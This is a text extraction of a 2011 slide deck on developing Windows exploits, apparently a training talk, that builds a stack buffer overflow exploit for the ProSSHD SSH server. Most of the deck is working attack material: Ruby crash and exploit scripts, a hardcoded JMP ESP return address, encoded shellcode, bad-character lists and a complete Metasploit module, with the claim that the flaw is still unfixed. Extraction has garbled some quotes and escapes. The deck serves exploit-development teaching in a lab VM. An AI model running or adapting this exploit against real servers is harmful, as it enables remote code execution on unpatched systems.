2011-03 Developing Windows Exploits by Allen Harper, N2NetSecurity, Inc.

1. Real
Windows
Exploits
Allen Harper
1

2. ProSSHD Vulnerability
Binary can be found at: http://www.exploit-db.com/application/11618
STILL NOT FIXED…0-days still work…
2

3. Install ProSSHD in vmware
• Set up W7 vmware client, host only mode.
• Determine vmware client IP.
• Ping vmware client from host system.
• Install Demo ProSSHD inside vm, run it.
3

4. Exploit Development Process
• Crash Program in Debugger
• Control EIP (next instruction)
• Determine Offset of Overwrite to EIP
• Determine Opcode to return to (new EIP)
• Determine Space Constraints
• Select and Test Shellcode
• Build Exploit Sandwich
• Determine Bad Characters
4

5. Immunity Debugger
• Fork from OllyDbg
• Still looks and feels like OllyDbg
• Adds a Python Command Shell
• Allows for more automation
• pvefindaddr is a great plugin tool for
exploit development! http://corelan.be
• Note: there was a problem with 1.74
• Current version is 1.80
5

6. Save Snapshot, Attach Debugger
• In Vmware, save snapshot (prior to sending)
• Send Exploit, with Sleep(15) before send
• File->Attach->wsshd.exe (may need to sort)
• In debugger, hit F9 to continue process
6

7. Crash the ProSSHD Server
• From host, crash remote server, control EIP
#prosshd1.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request = "x41" * 516
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end
• Run exploit with ruby prosshd1.rb
• Attach debugger to wsshd.exe, after it loads, Hit F9 twice
7

8. Determine the Offset(s)
• Revert VM, then use Pattern_Create
#prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request=
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8
Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah
3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A
j8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2
Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao
7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end
Run exploit with ruby prosshd2.rb
8

9. Determine the Offset(s)
• Attach Debugger to wsshd.exe
• After it loads, hit F9 twice
9

10. Determine the Offset(s)
10

11. Determine Op-Codes to Return to
• Determine the Control Vector, we could:
– JMP ESP
– RETN
• We choose JMP ESP
• Could use msfpescan on ntdll.dll
11

12. Determine Op-Codes to Return to
• Problem: Vista and beyond protect
NTDLL.DLL with ASLR
• Need to find a non-ASLR module
• This is the best way to bypass ASLR
• pvefindaddr is the tool of choice
• Run with !pvefindaddr j –r esp -n in
ImmDbg
• Results in file j.txt:
• C:Users[your name here]AppDataLocalVirtualStoreProgram Files
Immunity IncImmunity Debugger !
12

13. Determine Op-Code Address
==================================================================!
pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800!
-----Loaded modules ---------------------------------------------- !
Fixup | Base | Top | Size | SafeSEH | ASLR |NXCompat
| Modulename & Path!
----------------------------------------------------------------!
NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO
|MSVCR71.dll:C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll!
yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes
| kernel32.dll : C:Windowssystem32kernel32.dll!
yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes
| ntdll.dll : C:WindowsSYSTEM32ntdll.dll !
<truncated for brevity>!
NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO
| wsshd.exe : C:UsersPublicProgram FilesLab-NCProSSHDwsshd.exe!
<truncated for brevity>!
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable]
{PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **]
[Fixup: ** NO **] - !
C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll
<truncated for brevity>!
13

14. Find Space Constraints
• Crash with 2000 A s, calculate depth of
buffer
#prosshd3.rb …truncated for brevity…!
get_request = "x41" * 492 + "x42x42x42x42" +
x41 * 2000!
• Run, Attach, Crash, inspect stack for buffer size!
0x0012f758-0x0012ef88= 2000
So we can fit 2000 bytes of
shellcode into the buffer!
14

15. Select and Test Shellcode
• Generate your shellcode (switching to C)
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0a' -e x86/
shikata_ga_nai –t c sc.txt!
!
• Take that shellcode and copy paste into the following harness
//shellcode.c char shellcode[] = //copy paste from above!
x31xc0x31... your shellcode goes here;!
int main() { !//main function !
int *ret; !//ret pointer for saved ret !
ret = (int *)ret + 2;! //set ret to point to the saved return!
(*ret) = (int)shellcode; //change the saved ret to addr of shellcode!
}!
15

16. Select and Test Shellcode
Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable
program is not linked with /NXCOMPAT by default.
16

17. Build Exploit Sandwich
# prosshd4.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1'
password = 'test1
host = '10.10.10.143'
port = 22
shell= # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93 +
x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f +
x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04 +
x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb +
x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e +
x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6 +
xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21 +
xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11 +
x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a +
x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5 +
xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21 +
x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69 +
xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36 +
xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5 +
x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b +
x1bx35x1d;
# Overwrite eip with jmp esp (0x7c345c30) of msvcr71.dll
get_request = x41 * 492 + x30x5Cx34x7C + x90 * 1000 + xcc + shell
# lets do it...
Net::SSH.start( host, username, :password = password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file
end !
17

18. Test Exploit with Debugger
• Run with ruby prosshd4.rb
• Hit F9 twice to hit breakpoint
• Hit F9 to Continue, if crash, then bad
character.
18

19. Find Bad Characters
• Revert VM, resend exploit, step through
• Tip 1: right click on halted instruction, follow in dump…
Shellcode is
mangled…
why? bad
char x0a
19

20. Build new Shellcode
# msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0ax20' -e x86/
shikata_ga_nai -t ruby!
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) !
shell = !
x33xc9xb1x33xbdxe3x34x37xfbxdbxc6xd9x74x24 +!
xf4x5fx31x6fx0fx83xefxfcx03x6fxe8xd6xc2x07 +!
x06x9fx2dxf8xd6xc0xa4x1dxe7xd2xd3x56x55xe3 +!
x90x3bx55x88xf5xafxeexfcxd1xc0x47x4ax04xee +!
x58x7ax88xbcx9ax1cx74xbfxcexfex45x70x03xfe +!
x82x6dxebx52x5axf9x59x43xefxbfx61x62x3fxb4 +!
xd9x1cx3ax0bxadx96x45x5cx1dxacx0ex44x16xea + !
xaex75xfbxe8x93x3cx70xdax60xbfx50x12x88xf1 +!
x9cxf9xb7x3dx11x03xffxfaxc9x76x0bxf9x74x81 +!
xc8x83xa2x04xcdx24x21xbex35xd4xe6x59xbdxda +!
x43x2dx99xfex52xe2x91xfbxdfx05x76x8ax9bx21 +!
x52xd6x78x4bxc3xb2x2fx74x13x1ax90xd0x5fx89 +!
xc5x63x02xc4x18xe1x38xa1x1axf9x42x82x72xc8 +!
xc9x4dx05xd5x1bx2axf9x9fx06x1bx91x79xd3x19 +!
xfcx79x09x5dxf8xf9xb8x1exffxe2xc8x1bx44xa5 +!
x21x56xd5x40x46xc5xd6x40x25x88x44x08x84x2f +!
xecxabxd8xa5
Good list of bad chars: 00 0a 09 20 21
20

21. Metasploit Decoders
• Require space on the stack to decode
• Modules use stackadjustment parameter
• You may want to add 16 bytes of NOP to
beginning of payload to be safe.
21

22. Success!
• Revert VM to running state
• Launch Exploit with new shellcode
• Remove xcc, replace with x90, fire off exploit
• P0wn3d!!!!! Where do you want to go today!
22

23. Automating
• Metasploit as you have seen is an
excellent tool for both exploit development
and execution.
• You should look at existing modules, best
way to learn techniques.
• There is no ProSSHD module L
• We will create one and automate our
attack!
23

24. Metasploit Module Sections
• Header
• Initialize Section ( bad chars, targets)
• Exploit Section (guts of sploit, protocol)
24

25. Header
##!
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!
##!
!
##!
# This file is part of the Metasploit Framework and may be subject to!
# redistribution and commercial restrictions. Please see the Metasploit!
# Framework web site for more information on licensing and terms of use.!
# http://metasploit.com/framework/!
##!
!
require 'msf/core'!
%w{rubygems net/ssh net/scp}.each { |x| require x }!
!
class Metasploit3 Msf::Exploit::Remote!
!Rank = AverageRanking!
!
!include Msf::Exploit::Remote::Tcp!
25

26. Initialize Section
!def initialize(info = {})!
! !super(update_info(info,!
! !'Name' = 'ProSSHD 1.2.x SCP-GET Buffer Overflow',!
! !'Description' = %q{!
! !This module exploits a simple stack buffer overflow in ProSSHD 1.2.!
! !This flaw is due to a buffer overflow error when handling a specially!
! !crafted scp get request from an SSH client.!
! !**Based on original Exploit by S2 Crew [Hungary]!
! !},!
! !'Author' = 'AAH',!
! !'License' = MSF_LICENSE,!
! !'Version' = '$Revision: 10000 $',!
! !'References' = [],!
! !'DefaultOptions' = {'EXITFUNC' = 'process ,},!
! !'Payload' = {'Space' = 1000,!
! ! ! 'BadChars' = x00x09x0ax20x21,!
! ! ! 'StackAdjustment' = -3500,},!
! !'Platform' = 'win',!
! !'Targets' = [[ 'Windows 7', { 'Ret' = 0x7c345c30 } ],],!
! !'Privileged' = true,!
! !'DisclosureDate' = 'March 3, 2010',!
! !'DefaultTarget' = 0))!
! !register_options([ !
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]), !
! OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),!
! ! Opt::RPORT(22)], self.class)!
!end!
!
26

27. Exploit Section
def exploit!
! !!
!!
get_request = x41 * 492 + !
[target.ret].pack(‘V’) + !
x90 * 1000 +!
!payload.encoded # shellcode 8)!
! !
! !print_status(Trying to connect to #{datastore['RHOST']}...)!
! !!
! !# lets do it...!
! !Net::SSH.start( datastore['RHOST'], datastore['USERNAME'], :password = datastore
['PASSWORD']) do|ssh|!
! ! #sleep(15) # gives us time to attach to wsshd.exe!
! print_status(Sending sploit to #{datastore['RHOST']}...)!
! ! ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file!
! !end!
! !handler!
!end!
end!
!
27

28. Setup
• Next, install the following rubygems
• Have to run CygShell as Administrator (on older MSF)
• Right click on it in start menu, select run as
Administrator
28

29. Runit
• Restart vulnerable server
• Run Metasploit Console
29

30. Armitage Demo
30